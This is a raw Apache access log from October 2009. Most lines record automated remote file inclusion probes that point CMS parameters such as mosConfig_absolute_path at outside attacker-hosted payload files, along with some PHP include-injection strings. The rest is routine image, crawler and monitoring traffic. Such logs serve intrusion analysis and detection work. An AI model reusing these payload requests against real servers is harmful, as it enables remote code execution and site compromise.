218.234.21.178 - - [18/Oct/2009:04:52:32 -0400] "GET /logs/error_log.Q109072000//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 272 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
218.234.21.178 - - [18/Oct/2009:04:52:33 -0400] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 251 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
222.118.124.130 - - [18/Oct/2009:04:52:33 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:52:33 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
122.153.32.10 - - [18/Oct/2009:04:52:34 -0400] "GET /logs/error_log.Q109080200//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 235 "-" "Mozilla/5.0"
222.118.124.130 - - [18/Oct/2009:04:52:35 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:52:35 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
200.35.150.139 - - [18/Oct/2009:04:52:38 -0400] "GET /logs/access_log.Q109092200//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:04:52:33 -0400] "GET /logs/access_log.Q109052600 HTTP/1.1" 200 4651429 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
200.35.150.139 - - [18/Oct/2009:04:53:39 -0400] "GET /mosConfig_absolute_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 257 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:53:39 -0400] "GET /logs/error_log.Q109092700%20%20/mosConfig_absolute_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 285 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:53:39 -0400] "GET /logs/mosConfig_absolute_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 262 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:54:08 -0400] "GET /logs/access_log.Q109092200%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 240 "-" "Mozilla/5.0"
209.59.12.99 - - [18/Oct/2009:04:54:08 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
200.35.150.139 - - [18/Oct/2009:04:54:08 -0400] "GET /logs/error_log.Q109091800%20%20//comments.php?id=%7B$%7Binclude($ddd)%7D%7D%7B$%7Bexit()%7D%7D&ddd=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 239 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:04:54:12 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:04:54:12 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:04:54:12 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:04:54:25 -0400] "GET /logs//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:04:54:25 -0400] "GET /logs/access_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:04:54:25 -0400] "GET //index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:54:43 -0400] "GET /logs/access_log.Q109092700/mosConfig_absolute_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 284 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:54:43 -0400] "GET /logs//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 231 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:54:43 -0400] "GET /logs/access_log.Q109051500//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:54:43 -0400] "GET //bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 226 "-" "Mozilla/5.0"
174.133.148.98 - - [18/Oct/2009:04:54:44 -0400] "GET /logs/access_log.Q109073100%20%20///?_SERVER[DOCUMENT_ROOT]=http://n34.biz/id1.txt??? HTTP/1.1" 404 229 "-" "Mozilla/5.0"
200.35.150.139 - - [18/Oct/2009:04:54:50 -0400] "GET /logs/error_log.Q109092700/mosConfig_absolute_path=http://naturalmebel.com/bot/id1.txt?? HTTP/1.1" 404 283 "-" "Mozilla/5.0"
122.153.32.10 - - [18/Oct/2009:04:54:52 -0400] "GET /logs/error_log.Q109080200%20%20//index2.php?option=com_rss&no_html=1/index.php?_REQUEST=&_REQUEST%5boption%5d=com_content&_REQUEST%5bItemid%5d=1&GLOBALS=&mosConfig_absolute_path=http://www.diakonia-jkt.sch.id/upload/id1??? HTTP/1.1" 404 237 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET /logs/access_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 272 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET /logs//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 250 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:54:54 -0400] "GET //components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 245 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:55:27 -0400] "GET /logs/access_log.Q109081000//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:55:27 -0400] "GET /logs//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
211.48.121.149 - - [18/Oct/2009:04:55:33 -0400] "GET //modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 233 "-" "Mozilla/5.0"
222.118.124.130 - - [18/Oct/2009:04:55:39 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:55:39 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:55:40 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:55:40 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/tutorials.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
211.48.121.149 - - [18/Oct/2009:04:55:52 -0400] "GET /logs/access_log.Q109051500//modules/xgallery/upgrade_album.php?GALLERY_BASEDIR=http://www.mistresslorisdungeon.com//chat/inc/nyawa.txt?? HTTP/1.1" 404 260 "-" "Mozilla/5.0"
222.118.124.130 - - [18/Oct/2009:04:56:02 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:02 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
206.225.23.4 - - [18/Oct/2009:04:56:03 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:56:03 -0400] "GET /logs/error_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
222.118.124.130 - - [18/Oct/2009:04:56:03 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:03 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/products.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
206.225.23.4 - - [18/Oct/2009:04:56:04 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:56:05 -0400] "GET /logs/access_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 274 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:56:05 -0400] "GET /logs/error_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:04:56:00 -0400] "GET /logs/error_log.Q109092300 HTTP/1.0" 200 2611058 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
211.48.121.149 - - [18/Oct/2009:04:56:07 -0400] "GET /logs/access_log.Q109072200//bbs/jiyoo_skyblue/setup.php?dir=http://www.1004bang.net/1004bangmall/dataroom/review/idxx.txt?? HTTP/1.1" 404 253 "-" "Mozilla/5.0"
206.225.23.4 - - [18/Oct/2009:04:56:08 -0400] "GET /logs/error_log.Q109071600%20%20//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 273 "-" "Mozilla/5.0"
66.249.71.152 - - [18/Oct/2009:04:56:15 -0400] "GET /CGI-BIN/LANSAWEB?WEBEVENT+L0135794C95D87900D5E806W+M37+ENG HTTP/1.1" 500 197 "-" "Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)"
222.118.124.130 - - [18/Oct/2009:04:56:37 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:37 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:38 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:38 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/catalogs.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:42 -0400] "GET /images/login_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:42 -0400] "GET /images/psearch_go.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:44 -0400] "GET /images/login_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
222.118.124.130 - - [18/Oct/2009:04:56:44 -0400] "GET /images/psearch_go-over.gif HTTP/1.1" 304 - "http://www.acesurgical.com/product_info.html" "Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1) ; InfoPath.2; .NET CLR 2.0.50727; .NET CLR 3.0.4506.2152; .NET CLR 3.5.30729)"
72.30.78.230 - - [18/Oct/2009:04:56:06 -0400] "GET /logs/error_log.Q109092300 HTTP/1.0" 200 2611058 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
128.252.27.10 - - [18/Oct/2009:04:56:55 -0400] "GET /logs/access_log.Q109080200//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:04:56:55 -0400] "GET //?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
128.252.27.10 - - [18/Oct/2009:04:56:55 -0400] "GET /logs//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 22327 "-" "libwww-perl/5.805"
72.30.78.230 - - [18/Oct/2009:04:56:03 -0400] "GET /logs/access_log.Q109071700 HTTP/1.0" 200 3577551 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
128.252.27.10 - - [18/Oct/2009:04:57:08 -0400] "GET /logs/access_log.Q109062000//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 226 "-" "libwww-perl/5.805"
210.110.97.12 - - [18/Oct/2009:04:57:16 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:57:17 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:57:17 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:57:37 -0400] "GET /logs//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 214 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:57:39 -0400] "GET /logs/access_log.Q109051600//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 236 "-" "Mozilla/5.0"
210.110.97.12 - - [18/Oct/2009:04:57:39 -0400] "GET //kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.whinercentral.com/modules/Neos_Chronos/modules/mawar.txt?????? HTTP/1.1" 404 209 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:04:58:31 -0400] "GET /logs/access_log.Q109092700%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:04:58:29 -0400] "GET /logs/error_log.Q109080500 HTTP/1.0" 200 1809430 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.23.4 - - [18/Oct/2009:04:58:47 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
72.30.78.230 - - [18/Oct/2009:04:58:36 -0400] "GET /logs/error_log.Q109080500 HTTP/1.0" 200 1809430 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
206.225.23.4 - - [18/Oct/2009:04:58:54 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
222.236.47.182 - - [18/Oct/2009:04:58:58 -0400] "GET /logs/access_log.Q109081200%20%20//kboard.php?board=notice&act=write&no=3&page=&cid=&mode=reply&act=http://www.hydraumatec.com/mambots/editors/tinymce//jscripts/tiny_mce/plugins/media/css/1.txt?? HTTP/1.1" 404 238 "-" "Mozilla/5.0"
218.234.21.178 - - [18/Oct/2009:04:58:58 -0400] "GET /logs/access_log.Q109061300//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://www.misterplasma.be/htaccess.txt?? HTTP/1.1" 404 273 "-" "Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US; rv:1.7.12) Gecko/20050915 Firefox/1.0.7"
206.225.23.4 - - [18/Oct/2009:04:59:00 -0400] "GET /logs/error_log.Q109071600//components/com_rwcards/rwcards.advancedate.php?mosConfig_absolute_path=http://www.telephone114.com/114gg/upfile/scgi-bin/admin/sql/old/database/infinity/infinity/infinity/infinity/infinity.icicibank.co.in/Update.banking/oldid1??? HTTP/1.1" 404 271 "-" "Mozilla/5.0"
69.73.181.125 - - [18/Oct/2009:04:59:07 -0400] "GET //spaw_control.class.php?spaw_root=lover? HTTP/1.1" 404 221 "-" "libwww-perl/5.831"
69.73.181.125 - - [18/Oct/2009:04:59:07 -0400] "GET //spaw_control.class.php?spaw_root=http://www.bernardyni.ofm.pl/bernardyni/cgi-bin/motu.txt? HTTP/1.1" 404 221 "-" "libwww-perl/5.831"
209.59.12.99 - - [18/Oct/2009:04:59:09 -0400] "GET / HTTP/1.0" 200 409 "-" "check_http/1.81 (nagios-plugins 1.4)"
72.30.78.230 - - [18/Oct/2009:04:59:21 -0400] "GET /logs/access_log.Q109100700 HTTP/1.0" 304 - "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)"
65.172.143.253 - - [18/Oct/2009:04:59:39 -0400] "GET //?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 452 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:04:59:39 -0400] "GET /logs/access_log.Q109080200%20//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 404 227 "-" "libwww-perl/5.805"
65.172.143.253 - - [18/Oct/2009:04:59:39 -0400] "GET /logs//?mosConfig_absolute_path=http://www.eggsactrace.com/mambo/id.txt??? HTTP/1.1" 200 22327 "-" "libwww-perl/5.805"
